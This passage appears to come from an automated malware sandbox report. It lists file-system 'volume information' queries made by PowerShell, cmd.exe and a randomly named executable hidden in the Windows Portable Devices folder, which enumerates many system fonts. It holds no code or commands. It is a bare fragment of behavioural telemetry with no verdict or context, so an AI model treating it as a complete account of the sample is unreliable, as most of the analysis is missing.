Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
